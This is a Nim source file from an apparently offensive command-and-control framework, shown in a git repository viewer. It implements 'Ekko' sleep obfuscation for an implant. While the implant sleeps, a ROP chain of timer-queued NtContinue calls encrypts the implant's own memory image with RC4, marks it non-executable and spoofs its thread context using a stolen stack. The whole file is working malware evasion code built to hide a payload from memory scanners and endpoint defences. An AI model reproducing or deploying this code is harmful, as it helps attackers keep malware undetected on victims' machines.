admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
957f96f1ca5171e3d46d3a55e0c860911db547f7
conquest/src/agent/core/sleepmask.nim
Jakob Friedl 957f96f1ca Implemented COFF loader.
2025-08-28 19:00:34 +02:00

229 lines
11 KiB
Nim
Raw Blame History

import winim/lean
import winim/inc/tlhelp32
import os, system, strformat
import ../../common/[types, utils, crypto]
# Sleep obfuscation implementation based on Ekko, originally developed by C5pider
# The code in this file was taken from the MalDev Academy modules 54, 56 & 59 and translated from C to Nim
# https://maldevacademy.com/new/modules/54
# https://maldevacademy.com/new/modules/56
type
USTRING* {.bycopy.} = object
Length*: DWORD
MaximumLength*: DWORD
Buffer*: PVOID
EVENT_TYPE = enum
NotificationEvent,
SynchronizationEvent
# Required APIs (definitions taken from NtDoc)
proc RtlCreateTimerQueue*(phTimerQueueHandle: PHANDLE): NTSTATUS {.cdecl, stdcall, importc: protect("RtlCreateTimerQueue"), dynlib: protect("ntdll.dll").}
proc RtlDeleteTimerQueue(hQueue: HANDLE): NTSTATUS {.cdecl, stdcall, importc: protect("RtlDeleteTimerQueue"), dynlib: protect("ntdll.dll").}
proc NtCreateEvent*(phEvent: PHANDLE, desiredAccess: ACCESS_MASK, objectAttributes: POBJECT_ATTRIBUTES, eventType: EVENT_TYPE, initialState: BOOLEAN): NTSTATUS {.cdecl, stdcall, importc: protect("NtCreateEvent"), dynlib: protect("ntdll.dll").}
proc RtlCreateTimer(queue: HANDLE, hTimer: PHANDLE, function: FARPROC, context: PVOID, dueTime: ULONG, period: ULONG, flags: ULONG): NTSTATUS {.cdecl, stdcall, importc: protect("RtlCreateTimer"), dynlib: protect("ntdll.dll").}
proc NtSignalAndWaitForSingleObject(hSignal: HANDLE, hWait: HANDLE, alertable: BOOLEAN, timeout: PLARGE_INTEGER): NTSTATUS {.cdecl, stdcall, importc: protect("NtSignalAndWaitForSingleObject"), dynlib: protect("ntdll.dll").}
proc NtDuplicateObject(hSourceProcess: HANDLE, hSource: HANDLE, hTargetProcess: HANDLE, hTarget: PHANDLE, desiredAccess: ACCESS_MASK, attributes: ULONG, options: ULONG ): NTSTATUS {.cdecl, stdcall, importc: protect("NtDuplicateObject"), dynlib: protect("ntdll.dll").}
# Function for retrieving a random thread's thread context for stack spoofing
proc GetRandomThreadCtx(): CONTEXT =
var
ctx: CONTEXT
hSnapshot: HANDLE
thd32Entry: THREADENTRY32
hThread: HANDLE
thd32Entry.dwSize = DWORD(sizeof(THREADENTRY32))
# Create snapshot of all available threads
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0)
if hSnapshot == INVALID_HANDLE_VALUE:
raise newException(CatchableError, $GetLastError())
defer: CloseHandle(hSnapshot)
if Thread32First(hSnapshot, addr thd32Entry) == FALSE:
raise newException(CatchableError, $GetLastError())
while Thread32Next(hSnapshot, addr thd32Entry) != 0:
# Check if the thread belongs to the current process but is not the current thread
if thd32Entry.th32OwnerProcessID == GetCurrentProcessId() and thd32Entry.th32ThreadID != GetCurrentThreadId():
# Open handle to the thread
hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, thd32Entry.th32ThreadID)
if hThread == 0:
continue
# Retrieve thread context
ctx.ContextFlags = CONTEXT_ALL # This setting is required to be able to fill the CONTEXT structure
if GetThreadContext(hThread, addr ctx) == 0:
continue
echo fmt"[*] Using thread {thd32Entry.th32ThreadID} for stack spoofing."
break
return ctx
# Ekko sleep obfuscation with stack spoofing
proc sleepEkko*(sleepDelay: int) =
var
status: NTSTATUS = 0
img: USTRING = USTRING(Length: 0)
key: USTRING = USTRING(Length: 0)
ctx: array[10, CONTEXT]
ctxInit: CONTEXT
ctxBackup: CONTEXT
ctxSpoof: CONTEXT
hThread: HANDLE
hEvent: HANDLE
hEventStart: HANDLE
hEventEnd: HANDLE
queue: HANDLE
timer: HANDLE
value: DWORD = 0
delay: DWORD = 0
try:
var
NtContinue = GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtContinue"))
SystemFunction032 = GetProcAddress(LoadLibraryA(protect("Advapi32")), protect("SystemFunction032"))
# Locate image base and size
var imageBase = GetModuleHandleA(NULL)
var imageSize = (cast[PIMAGE_NT_HEADERS](imageBase + (cast[PIMAGE_DOS_HEADER](imageBase)).e_lfanew)).OptionalHeader.SizeOfImage
# echo fmt"[+] Image base at: 0x{cast[uint64](imageBase).toHex()} ({imageSize} bytes)"
img.Buffer = cast[PVOID](imageBase)
img.Length = imageSize
# Generate random encryption key
var keyBuffer: string = Bytes.toString(generateBytes(Key16))
key.Buffer = keyBuffer.addr
key.Length = cast[DWORD](keyBuffer.len())
# Sleep obfuscation implementation using NTAPI
# Create timer queue
status = RtlCreateTimerQueue(addr queue)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
defer: discard RtlDeleteTimerQueue(queue)
# Create events
status = NtCreateEvent(addr hEvent, EVENT_ALL_ACCESS, NULL, NotificationEvent, FALSE)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
defer: CloseHandle(hEvent)
status = NtCreateEvent(addr hEventStart, EVENT_ALL_ACCESS, NULL, NotificationEvent, FALSE)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
defer: CloseHandle(hEventStart)
status = NtCreateEvent(addr hEventEnd, EVENT_ALL_ACCESS, NULL, NotificationEvent, FALSE)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
defer: CloseHandle(hEventEnd)
# Retrieve a random thread context from the current process
ctxSpoof = GetRandomThreadCtx()
# Retrieve the initial thread context
status = RtlCreateTimer(queue, addr timer, RtlCaptureContext, addr ctxInit, 0, 0, WT_EXECUTEINTIMERTHREAD)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
# Wait until RtlCaptureContext is successfully completed to prevent a race condition from forming
status = RtlCreateTimer(queue, addr timer, SetEvent, addr hEvent, 0, 0, WT_EXECUTEINTIMERTHREAD)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
WaitForSingleObject(hEvent, 1000)
# Create handle to the current process
status = NtDuplicateObject(GetCurrentProcess(), GetCurrentThread(), GetCurrentProcess(), addr hThread, THREAD_ALL_ACCESS, 0, 0)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
defer: CloseHandle(hThread)
# Preparing the ROP chain
# Initially, each element in this array will have the same context as the timer's thread context
for i in 0 ..< ctx.len():
copyMem(addr ctx[i], addr ctxInit, sizeof(CONTEXT))
dec(ctx[i].Rsp, 8) # Stack alignment, due to the RSP register being incremented by the size of a pointer
# ROP Chain
# ctx[0] contains the call to WaitForSingleObjectEx, which waits for a signal to start and execute the rest of the chain.
ctx[0].Rip = cast[DWORD64](WaitForSingleObjectEx)
ctx[0].Rcx = cast[DWORD64](hEventStart)
ctx[0].Rdx = cast[DWORD64](INFINITE)
ctx[0].R8 = cast[DWORD64](NULL)
# ctx[1] contains the call to VirtualProtect, which changes the protection of the payload image memory to [RW-]
ctx[1].Rip = cast[DWORD64](VirtualProtect)
ctx[1].Rcx = cast[DWORD64](imageBase)
ctx[1].Rdx = cast[DWORD64](imageSize)
ctx[1].R8 = cast[DWORD64](PAGE_READWRITE)
ctx[1].R9 = cast[DWORD64](addr value)
# ctx[2] contains the call to SystemFunction032, which performs the actual payload memory obfuscation using RC4.
ctx[2].Rip = cast[DWORD64](SystemFunction032)
ctx[2].Rcx = cast[DWORD64](addr img)
ctx[2].Rdx = cast[DWORD64](addr key)
# Ctx[3] contains the call to GetThreadContext, which retrieves the payload's main thread context and saves it into the CtxBackup variable for later restoration.
ctxBackup.ContextFlags = CONTEXT_ALL
ctx[3].Rip = cast[DWORD64](GetThreadContext)
ctx[3].Rcx = cast[DWORD64](hThread)
ctx[3].Rdx = cast[DWORD64](addr ctxBackup)
# Ctx[4] contains the call to SetThreadContext that will spoof the payload thread by setting the thread context with the stolen context.
ctx[4].Rip = cast[DWORD64](SetThreadContext)
ctx[4].Rcx = cast[DWORD64](hThread)
ctx[4].Rdx = cast[DWORD64](addr ctxSpoof)
# ctx[5] contains the call to WaitForSingleObjectEx, which delays execution and simulates sleeping until the specified timeout is reached.
ctx[5].Rip = cast[DWORD64](WaitForSingleObjectEx)
ctx[5].Rcx = cast[DWORD64](GetCurrentProcess())
ctx[5].Rdx = cast[DWORD64](cast[DWORD](sleepDelay))
ctx[5].R8 = cast[DWORD64](FALSE)
# ctx[6] contains the call to SystemFunction032 to decrypt the previously encrypted payload memory
ctx[6].Rip = cast[DWORD64](SystemFunction032)
ctx[6].Rcx = cast[DWORD64](addr img)
ctx[6].Rdx = cast[DWORD64](addr key)
# Ctx[7] calls SetThreadContext to restore the original thread context from the previously saved CtxBackup.
ctx[7].Rip = cast[DWORD64](SetThreadContext)
ctx[7].Rcx = cast[DWORD64](hThread)
ctx[7].Rdx = cast[DWORD64](addr ctxBackup)
# ctx[5] contains the call to VirtualProtect to change the payload memory back to [R-X]
ctx[8].Rip = cast[DWORD64](VirtualProtect)
ctx[8].Rcx = cast[DWORD64](imageBase)
ctx[8].Rdx = cast[DWORD64](imageSize)
ctx[8].R8 = cast[DWORD64](PAGE_EXECUTE_READWRITE)
ctx[8].R9 = cast[DWORD64](addr value)
# ctx[6] contains the call to the SetEvent WinAPI that will set hEventEnd event object in a signaled state. This with signal that the obfuscation chain is complete
ctx[9].Rip = cast[DWORD64](SetEvent)
ctx[9].Rcx = cast[DWORD64](hEventEnd)
# Executing timers
for i in 0 ..< ctx.len():
delay += 100
status = RtlCreateTimer(queue, addr timer, NtContinue, addr ctx[i], delay, 0, WT_EXECUTEINTIMERTHREAD)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
echo protect("[*] Triggering sleep obfuscation.")
status = NtSignalAndWaitForSingleObject(hEventStart, hEventEnd, FALSE, NULL)
if status != STATUS_SUCCESS:
raise newException(CatchableError, $status.toHex())
except CatchableError as err:
sleep(sleepDelay)
echo protect("[-] "), err.msg
Reference in New Issue View Git Blame Copy Permalink